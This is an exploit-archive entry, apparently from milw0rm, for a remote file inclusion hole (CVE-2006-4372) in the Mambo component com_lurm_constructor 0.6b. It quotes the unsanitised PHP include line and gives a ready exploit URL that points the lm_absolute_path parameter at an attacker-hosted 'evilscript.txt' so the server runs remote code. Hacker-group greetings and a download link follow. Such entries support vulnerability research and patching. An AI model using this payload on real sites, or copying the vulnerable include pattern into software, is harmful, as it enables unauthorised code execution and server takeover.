![$site['logo_alt']](/img/neosense-logo.png){kind=logo}
NeoSense Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion
Author: mdx type: webapps platform: php port: date_added: 2006-08-18 date_updated: verified: 1 codes: OSVDB-28935;CVE-2006-4372 tags: aliases: screenshot_url: application_url: raw file: 2222.txt
#################################################### # # # C Y BE R - W A R R i O R T I M # # # #################################################### mambo com_lurm_constructor Component (mosConfig_absolute_path) Remote File Inclusion Vulnerabilities #################################################### Author: mdx #################################################### Class : Remote #################################################### cont@ct: bilkopat[at]hotmail[dot]com #################################################### Code: admin.lurm_constructor.php, line 2 include($lm_absolute_path.'/admin/components/com_lurm/lang/lurm.'.$lm_adminlang); Exploit: http://www.site.com/[path]/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://site.com/evilscript.txt? ################################################### Greetz: Cyber-warrior TIM USERS and The_Bat_Hacker ################################################### download link http://limbo-cms.com.ru/index.php/option/lurm/smpl/8/id/83/fld/usr_hits/task/url_visit/url/usr_file # milw0rm.com [2006-08-19]